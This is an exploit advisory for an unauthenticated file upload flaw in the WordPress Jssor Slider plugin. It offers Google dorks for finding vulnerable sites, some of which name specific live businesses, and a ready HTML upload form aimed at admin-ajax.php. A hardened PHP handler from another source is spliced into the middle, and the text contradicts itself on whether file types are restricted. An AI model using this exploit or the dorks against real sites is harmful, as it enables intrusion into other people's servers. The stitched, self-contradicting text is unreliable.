- ##########################################################################
- # Exploit Title : WordPress Jssor-Slider Plugins 3.1.24 CSRF Arbitrary File Upload
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/02/2019
- # Vendor Homepage : jssor.com ~ drcsystems.com ~ ethicsolutions.com
- # Software Download Link : downloads.wordpress.org/plugin/jssor-slider.3.1.24.zip
- # Software Information Link : wordpress.org/plugins/jssor-slider/
- # Software Affected Version : 3.1.24 and previous versions
- # Tested On : Windows
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/wp-content/jssor-slider/''
- # Vulnerability Type : CWE-284 [ Improper Access Control ] - CWE-862 [ Missing Authorization ]
- # CXSecurity Reference Link : cxsecurity.com/ascii/WLB-2018060226
- # Cyberizm Reference Link : cyberizm.org/cyberizm-wordpress-drcsystems-ethicsolutions-jssorslider-exploit.html
- ##########################################################################
- # Description About Software :
- ****************************
- Description : “Jssor Slider by jssor.com” is open source software.
- Jssor Slider is a professional, lightweight and easy-to-use
- slideshow/slider/gallery/carousel/banner. It is optimized for mobile devices and has tons of unique features.
- # Key Features :
- Touch Swipe - 200+ Slideshow Transitions - Layer Animation -
- Fast Loading, load slider html code from disk cache directly -
- High Performance Light Weight - Easy to Use - Repeated Layer Animation -
- Image Layer - Text/Html Layer - Panel Layer - Nested Layer -
- Layer Blending - Clip Mask - Multiplex Transition - z-index Animation -
- Timeline Break - Dozens of bullet/arrow/thumbnail skins
- ##########################################################################
- # Google Dorks :
- *********************
- inurl:''/wp-content/jssor-slider/jssor-uploads/''
- intext:''Managed by Web development company Ethic Solutions''
- intext:''Todos los derechos reservados © Ecuaauto - Distribuidor autorizado Chevrolet Ecuador''
- intext:''Website Developed by DRC Systems''
- ##########################################################################
- Vulnerable Source Code :
- ************************
- When the plugin is active, the function register_ajax_calls() in the file /lib/jssor-slider-class.php is run (shown below).
- It hooks two AJAX functions onto admin_init, which gives anyone access to functionality that is only intended to be accessible to users logged in as Administrators.
- The upload_library() function reachable this way handles uploading a file through /lib/upload.php.
- That file does no check on who is making the request and does not restrict what type of files can be uploaded.
- It is also possible to exploit this by sending a request directly to the file /lib/upload.php, as long as the undefined constant in that file isn’t treated as an error.
- The following proof of concept will upload the selected file to the directory /wp-content/jssor-slider/jssor-uploads/.
- Make sure to replace “[path to WordPress]” with the location of WordPress.
public function register_ajax_calls() {
    if ( isset( $_REQUEST['action'] ) ) {
        switch ( $_REQUEST['action'] ) {
            case 'add_new_slider_library' :
                // admin_init fires on every admin-ajax.php request, before WordPress
                // checks whether the visitor is logged in, so this runs for anyone.
                add_action( 'admin_init', 'jssor_slider_library' );
                function jssor_slider_library() {
                    include_once JSSOR_SLIDER_PATH . '/lib/add-new-slider-class.php';
                }
                break;
            case 'upload_library' :
                // Same problem: no capability check or nonce before the upload code is included.
                add_action( 'admin_init', 'upload_library' );
                function upload_library() {
                    include_once JSSOR_SLIDER_PATH . '/lib/upload.php';
                }
                break;
        }
    }
}
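As an added example (not code from the advisory or from the plugin), this is how the upload_library handler could be registered and hardened in WordPress so that the admin_init problem, the missing authorization and the unrestricted file type are all closed; the hook name wp_ajax_upload_library, the nonce action jssor_upload_library, the manage_options capability and the image allowlist are choices made here.

```php
<?php
// Added example, not the plugin's code: a hardened replacement for the upload_library
// AJAX handler. Assumes a WordPress install; the hook name, nonce action, capability
// and MIME allowlist are choices made here, not taken from the plugin.

// wp_ajax_{action} fires only for logged-in users, after WordPress has checked the
// session. No wp_ajax_nopriv_ twin is registered, so anonymous requests to
// admin-ajax.php?action=upload_library never reach this code.
add_action( 'wp_ajax_upload_library', 'jssor_hardened_upload_library' );

function jssor_hardened_upload_library() {
    // Authorization: being logged in is not enough, require an administrator capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // CSRF: the request must carry a nonce issued for this action; check_ajax_referer()
    // ends the request itself when the nonce is missing or invalid.
    check_ajax_referer( 'jssor_upload_library', 'nonce' );

    if ( empty( $_FILES['file']['tmp_name'] ) || ! is_uploaded_file( $_FILES['file']['tmp_name'] ) ) {
        wp_send_json_error( array( 'message' => 'No file uploaded.' ), 400 );
    }

    // Allowlist instead of the original "everything except php and asp" denylist:
    // a slider only needs images, so html, txt, svg and the like are rejected too.
    $allowed_mimes = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
    );

    // Validate the extension and the file's actual content type against the allowlist.
    $check = wp_check_filetype_and_ext( $_FILES['file']['tmp_name'], $_FILES['file']['name'], $allowed_mimes );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        wp_send_json_error( array( 'message' => 'File type not permitted.' ), 415 );
    }

    require_once ABSPATH . 'wp-admin/includes/file.php';

    // wp_handle_upload() sanitizes the file name, moves the file into the uploads
    // directory and re-checks the MIME type against the same allowlist.
    $result = wp_handle_upload( $_FILES['file'], array( 'test_form' => false, 'mimes' => $allowed_mimes ) );
    if ( isset( $result['error'] ) ) {
        wp_send_json_error( array( 'message' => $result['error'] ), 400 );
    }

    wp_send_json_success( array( 'url' => $result['url'] ) );
}
```

The admin-side form that posts to this handler has to emit the nonce with wp_nonce_field( 'jssor_upload_library', 'nonce' ); a request without it is terminated by check_ajax_referer() before any file is touched.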
- #####################################################################################################
- # Exploit :
- **********
- /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
- # Error : {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
- # Exploit Code :
- ***************
<html>
<body>
    <form action="http://[PATH]/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method="POST" enctype="multipart/form-data">
        <input type="file" name="file" />
        <input type="submit" value="Submit" />
    </form>
</body>
</html>
- # Uploaded File Path :
- ********************
- /wp-content/jssor-slider/jssor-uploads/.....
- # Allowed File Extensions : php and asp are blocked [ Not Allowed ].
- All other file extensions are allowed, for example html, txt, etc.
- # Usage : Use with XAMPP Control Panel and with your Localhost [ 127.0.0.1 ]
- localhost/jssorsliderexploiter.html
- #################################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- #################################################################################################